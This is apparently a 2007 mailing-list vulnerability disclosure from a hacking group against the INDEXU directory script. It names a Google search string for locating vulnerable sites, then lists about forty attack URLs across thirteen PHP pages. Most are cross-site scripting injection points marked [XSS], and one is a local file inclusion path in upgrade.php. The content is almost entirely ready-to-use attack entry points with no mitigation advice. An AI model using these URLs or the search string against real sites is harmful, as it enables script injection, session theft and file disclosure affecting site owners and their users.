<<< Date Index >>>     <<< Thread Index >>>

vulnerability script indexu all versions



vulnerability script indexu all versions
Found by :SwEET-DeViL & viP HaCkEr & HaCkEr sUn
TeaM AL-GaRNi
Application : indexu
version : all versions
URL : http://www.nicecoder.com/
google : "Powered by INDEXU 5."

Exploits :
|//1\\|
in upgrade.php
http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS] 
___or #../index.php
AND Local File Include~
##########################
|//2\\|
in suggest_category.php
http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
##########################
|//3\\|
in user_detail.php
http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS]
##########################
|//4\\|
in tell_friend.php
http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]

http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS]
##########################
|//5\\|
in sendmail.php
http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS]
##########################
//6\\
in send_pwd.php
http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS]
##########################
|//7\\|
in search.php
http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS]
##########################
|//8\\|
http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/register.php?username=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password=[XSS]
http://www.site.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.site.com/INDEXU_PATH/register.php?email=[XSS]
##########################
|//9\\|
power_search.php
http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS]
http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS]
##########################
|//10\\|
in new.php
http://www.site.com/INDEXU_PATH/new.php?path=[XSS]
http://www.site.com/INDEXU_PATH//new.php?total=[XSS]
##########################
|//11\\|
in modify.php
http://www.site.com/INDEXU_PATH/modify.php?pflag=search&query=[XSS]
##########################
|//12\\|
in mailing_list.php
http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS]
##########################
|//13\\|
in login.php
http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS]
##########################
|//...$...\\|
There is another vulnerability in the program, a XSS
:::::::::::::::::::::::::::::::::
:: ###########     ########### ::
:: ###########     ########### ::
:: ###             ###     ### ::
:: ###             ########### ::
:: ###   ######    ########### ::
:: ###   ## ### == ###  ###    ::
:: ###      ### == ###   ###   ::
:: ############    ###    ###  ::
:: ############    ###    ###  ::
:::::::::::::::::::::::::::::::::
##########################
#####gamr-14@xxxxxxxxxxx##
#####Error@xxxxxxx########
########(c)2007###########